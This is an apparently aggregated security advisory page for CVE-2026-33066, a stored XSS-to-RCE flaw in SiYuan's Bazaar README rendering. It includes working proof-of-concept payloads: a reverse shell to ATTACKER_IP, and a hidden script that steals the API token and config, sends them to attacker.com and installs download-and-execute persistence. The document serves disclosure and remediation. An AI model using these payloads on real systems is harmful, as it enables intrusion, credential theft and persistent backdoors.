Skip to main content

Node.js CVE-2026-33066

CRITICAL
Cross-site Scripting (XSS) (CWE-79)
2026-03-18 https://github.com/siyuan-note/siyuan GHSA-4663-4mpg-879v
Critical
Disputed · 9.0 NVD
Share

Severity by source

Sources disagree (Low–Critical)
GitHub Advisory PRIMARY
9.0 CRITICAL
AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
SUSE
3.1 LOW
AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

vuln.today treats the vendor’s rating as authoritative. A higher third-party CVSS (e.g. CISA-ADP) is shown for transparency but does not drive the headline severity.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Analysis Generated
Mar 18, 2026 - 16:15 vuln.today
Patch released
Mar 18, 2026 - 16:15 nvd
Patch available
CVE Published
Mar 18, 2026 - 16:09 nvd
CRITICAL 9.0

DescriptionGitHub Advisory

Stored XSS to RCE via Unsanitized Bazaar README Rendering

Summary

SiYuan's Bazaar (community marketplace) renders package README content without HTML sanitization. The backend renderREADME function uses lute.New() without calling SetSanitize(true), allowing raw HTML embedded in Markdown to pass through unmodified. The frontend then assigns the rendered HTML to innerHTML without any additional sanitization. A malicious package author can embed arbitrary JavaScript in their README that executes when a user clicks to view the package details. Because SiYuan's Electron configuration enables nodeIntegration: true with contextIsolation: false, this XSS escalates directly to full Remote Code Execution.

Affected Component

  • README rendering (backend): kernel/bazaar/package.go:635-645 (renderREADME function)
  • README rendering (frontend): app/src/config/bazaar.ts:607 (innerHTML assignment)
  • Electron config: app/electron/main.js:422-426 (nodeIntegration: true, contextIsolation: false)

Affected Versions

  • SiYuan <= 3.5.9

-

Severity

Critical - CVSS 9.6 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)

  • CWE-79: Improper Neutralization of Input During Web Page Generation (Stored XSS)

Note: This vector requires one click (user viewing the package README), unlike the metadata vector which is zero-click.

Vulnerable Code

Backend: kernel/bazaar/package.go:635-645

go
func renderREADME(repoURL string, mdData []byte) (ret string, err error) {
    luteEngine := lute.New()  // Fresh Lute instance - SetSanitize NOT called
    luteEngine.SetSoftBreak2HardBreak(false)
    luteEngine.SetCodeSyntaxHighlight(false)
    linkBase := "https://cdn.jsdelivr.net/gh/" + ...
    luteEngine.SetLinkBase(linkBase)
    ret = luteEngine.Md2HTML(string(mdData))  // Raw HTML in Markdown is PRESERVED
    return
}

Compare with SiYuan's own note renderer in kernel/util/lute.go:81, which does sanitize:

go
luteEngine.SetSanitize(true)  // Notes ARE sanitized - but Bazaar README is NOT

This inconsistency demonstrates that the project is aware of the Lute sanitization API but failed to apply it to Bazaar content.

Frontend: app/src/config/bazaar.ts:607

typescript
fetchPost("/api/bazaar/getBazaarPackageREADME", {...}, response => {
    mdElement.innerHTML = response.data.html;  // Unsanitized HTML injected into DOM
});

The backend returns unsanitized HTML, and the frontend blindly assigns it to innerHTML without any client-side sanitization (e.g., DOMPurify).

Electron: app/electron/main.js:422-426

javascript
webPreferences: {
    nodeIntegration: true,
    contextIsolation: false,
    // ...
}

Any JavaScript executing in the renderer has direct access to Node.js APIs.

Proof of Concept

Step 1: Create a malicious README

Create a GitHub repository with a valid SiYuan plugin/theme/template structure. The README.md contains embedded HTML:

markdown
# Helpful Productivity Plugin

This plugin helps you organize your notes with smart templates and AI-powered suggestions.
## Features

- Smart template insertion
- AI-powered note organization
- Cross-platform sync

<img src=x onerror="require('child_process').exec('calc.exe')">
## Installation

Install via the SiYuan Bazaar marketplace.
## License

MIT

The raw <img> tag with onerror handler is valid Markdown (HTML passthrough). The Lute engine preserves it because SetSanitize(true) is not called. The frontend renders it via innerHTML, and the broken image triggers onerror, executing calc.exe.

Step 2: Submit to Bazaar

Submit the repository to the SiYuan Bazaar via the standard community contribution process.

Step 3: One-click RCE

When a SiYuan user browses the Bazaar, sees the package listing, and clicks on it to view the README/details, the unsanitized HTML renders in the detail panel. The onerror handler fires, executing arbitrary OS commands.

Escalation: Reverse shell

markdown
# Cool Theme for SiYuan

Beautiful dark theme with custom fonts.

<img src=x onerror="require('child_process').exec('bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\"')">

Escalation: Multi-stage payload via README

A more sophisticated attack can hide the payload deeper in the README to avoid casual review:

markdown
# Professional Note Templates

A comprehensive collection of note templates for professionals.
## Templates Included

| Category | Count | Description |
|----------|-------|-------------|
| Business | 15 | Meeting notes, project plans |
| Academic | 12 | Research notes, citations |
| Personal | 8 | Journal, habit tracking |
## Screenshots

<!-- Legitimate-looking image reference -->
<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://attacker.com/dark.png">
  <source media="(prefers-color-scheme: light)" srcset="https://attacker.com/light.png">
  <img src="https://attacker.com/screenshot.png" alt="Template Preview" onload="
    var c = require('child_process');
    var o = require('os');
    var f = require('fs');
    var p = require('path');

    // Exfiltrate sensitive data
    var home = o.homedir();
    var configDir = p.join(home, '.config', 'siyuan');
    var data = {};

    try { data.apiToken = f.readFileSync(p.join(configDir, 'cookie.key'), 'utf8'); } catch(e) {}
    try { data.conf = JSON.parse(f.readFileSync(p.join(configDir, 'conf.json'), 'utf8')); } catch(e) {}
    try { data.hostname = o.hostname(); data.user = o.userInfo().username; data.platform = o.platform(); } catch(e) {}

    // Send to attacker
    var https = require('https');
    var payload = JSON.stringify(data);
    var req = https.request({
      hostname: 'attacker.com', port: 443, path: '/collect', method: 'POST',
      headers: { 'Content-Type': 'application/json', 'Content-Length': payload.length }
    });
    req.write(payload);
    req.end();

    // Drop persistence
    if (o.platform() === 'win32') {
      c.exec('schtasks /create /tn SiYuanSync /tr \"powershell -w hidden -ep bypass -c IEX((New-Object Net.WebClient).DownloadString(\\\"https://attacker.com/stage2.ps1\\\"))\" /sc onlogon /rl highest /f');
    } else {
      c.exec('(crontab -l 2>/dev/null; echo \"@reboot curl -s https://attacker.com/stage2.sh | bash\") | crontab -');
    }
  ">
</picture>
## Changelog

- v1.0.0: Initial release

This payload:

  1. Uses onload instead of onerror (fires on successful image load from attacker's server)
  2. Exfiltrates SiYuan API token, config, hostname, username, and platform info
  3. Installs cross-platform persistence (Windows scheduled task / Linux crontab)
  4. Is buried inside a legitimate-looking <picture> element that blends with real README content

Escalation: SVG-based payload (bypasses naive img filtering)

markdown
## Architecture

<svg onload="require('child_process').exec('id > /tmp/pwned')">
  <rect width="100" height="100" fill="blue"/>
</svg>

Escalation: Details/summary element (interactive trigger)

markdown
## FAQ

<details ontoggle="require('child_process').exec('whoami > /tmp/pwned')" open>
  <summary>How do I install this plugin?</summary>
  Use the SiYuan Bazaar to install.
</details>

The open attribute causes ontoggle to fire immediately without user interaction with the element itself.

Attack Scenario

  1. Attacker creates a legitimate-looking GitHub repository with a SiYuan plugin/theme/template.
  2. The README contains a well-crafted payload hidden within legitimate-looking content (e.g., inside a <picture> tag, <details> block, or <svg>).
  3. Attacker submits the package to the SiYuan Bazaar via the community contribution process.
  4. A SiYuan user browses the Bazaar and clicks on the package to view its details/README.
  5. The backend renders the README via renderREADME() without sanitization.
  6. The frontend assigns the HTML to innerHTML.
  7. The injected JavaScript executes with full Node.js access.
  8. The attacker achieves RCE - reverse shell, data theft, persistence, etc.

Impact

  • Full remote code execution on any SiYuan desktop user who views the malicious package README
  • One-click - triggered by viewing package details in the Bazaar
  • Supply-chain attack via the official SiYuan community marketplace
  • Payloads can be deeply hidden in legitimate-looking README content, making code review difficult
  • Can steal API tokens, SiYuan configuration, SSH keys, browser credentials, and arbitrary files
  • Can install persistent backdoors across Windows, macOS, and Linux
  • Multiple HTML elements can carry payloads (img, svg, details, picture, video, audio, iframe, object, embed, math, etc.)
  • Affects all platforms: Windows, macOS, Linux

Suggested Fix

1. Enable Lute sanitization for README rendering (package.go)

go
func renderREADME(repoURL string, mdData []byte) (ret string, err error) {
    luteEngine := lute.New()
    luteEngine.SetSanitize(true)  // ADD THIS - matches note renderer behavior
    luteEngine.SetSoftBreak2HardBreak(false)
    luteEngine.SetCodeSyntaxHighlight(false)
    linkBase := "https://cdn.jsdelivr.net/gh/" + ...
    luteEngine.SetLinkBase(linkBase)
    ret = luteEngine.Md2HTML(string(mdData))
    return
}

2. Add client-side sanitization as defense-in-depth (bazaar.ts)

typescript
import DOMPurify from 'dompurify';

fetchPost("/api/bazaar/getBazaarPackageREADME", {...}, response => {
    mdElement.innerHTML = DOMPurify.sanitize(response.data.html);
});

3. Long-term: Harden Electron configuration

javascript
webPreferences: {
    nodeIntegration: false,
    contextIsolation: true,
    sandbox: true,
}

AnalysisAI

SiYuan's Bazaar (community package marketplace) fails to sanitize HTML in package README files during rendering, allowing stored XSS that escalates to remote code execution due to unsafe Electron configuration. An attacker can submit a malicious package with embedded JavaScript in the README that executes with full Node.js access when any user views the package details in the Bazaar. This affects SiYuan versions 3.5.9 and earlier across Windows, macOS, and Linux, with a CVSS score of 9.6 and multiple real-world exploitation vectors including data theft, reverse shells, and persistent backdoors.

Technical ContextAI

The vulnerability stems from three converging weaknesses in SiYuan (affected CPE: pkg:go/github.com_siyuan-note_siyuan_kernel): the backend's renderREADME() function in kernel/bazaar/package.go uses the Lute Markdown parser without calling SetSanitize(true), allowing raw HTML embedded in Markdown to pass through unmodified. The Lute library itself supports sanitization via the SetSanitize API (as demonstrated in SiYuan's own note renderer at kernel/util/lute.go:81), but this was not applied to Bazaar content—a critical inconsistency. The frontend then assigns the unsanitized HTML to innerHTML in app/src/config/bazaar.ts:607 without client-side sanitization (e.g., DOMPurify). Finally, the Electron process is configured in app/electron/main.js with nodeIntegration: true and contextIsolation: false, meaning any JavaScript executing in the renderer has direct access to Node.js APIs including child_process, fs, and os modules. This creates a direct path from stored XSS to arbitrary code execution. The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), compounded by unsafe Electron hardening.

RemediationAI

Upgrade SiYuan to the version released after the published patch (verify against commit b382f50e1880ed996364509de5a10a72d7409428 on the official GitHub repository). The patch enables Lute's SetSanitize(true) for README rendering and is the definitive fix. Until patching is possible, disable Bazaar access entirely if the application permits, or restrict network access to the device to prevent users from browsing untrusted packages. As defense-in-depth, the vendor should implement client-side sanitization using a library like DOMPurify and progressively harden the Electron configuration by disabling nodeIntegration, enabling contextIsolation, and enabling sandboxing. For enterprises, restrict installation of SiYuan versions prior to the patched release, and monitor endpoints for suspicious child process spawning from the SiYuan process (calc.exe, bash, powershell spawned by node.js). Users should immediately update via the official SiYuan website or package manager once a patched version is available.

CVE-2024-55591 CRITICAL POC
9.8 Jan 14

FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote

CVE-2014-7205 CRITICAL POC
10.0 Oct 08

Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t

CVE-2025-59528 CRITICAL POC
10.0 Sep 22

Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete

CVE-2017-14849 HIGH POC
7.5 Sep 28

Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc

CVE-2017-5941 CRITICAL POC
9.8 Feb 09

An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner

CVE-2014-3744 HIGH POC
7.5 Oct 23

Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi

CVE-2014-9566 HIGH POC
7.5 Mar 10

Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin

CVE-2013-4660 MEDIUM POC
6.8 Jun 28

The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic

CVE-2015-5688 MEDIUM POC
5.0 Sep 04

Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read

CVE-2026-45321 CRITICAL POC
9.6 May 12

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio

CVE-2014-7192 CRITICAL POC
10.0 Dec 11

Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat

CVE-2013-4450 MEDIUM POC
5.0 Oct 21

The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se

Vendor StatusVendor

SUSE

Severity: Low
Product Status
openSUSE Leap 15.6 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP5 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP6 Fixed
openSUSE Leap 15.5 Fixed

Share

CVE-2026-33066 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy